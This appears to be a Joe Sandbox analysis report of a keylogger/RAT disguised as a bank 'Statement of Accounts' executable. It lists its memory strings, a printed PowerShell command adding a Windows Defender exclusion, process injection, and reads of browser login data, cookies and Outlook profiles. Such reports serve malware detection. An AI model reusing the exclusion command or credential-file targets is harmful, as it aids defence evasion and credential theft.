Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E26000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, 00000005.00000002.4616348149.0000000013E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Memory written: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Thread register set: target process: 5312

Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"			Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Process created: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe"			Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe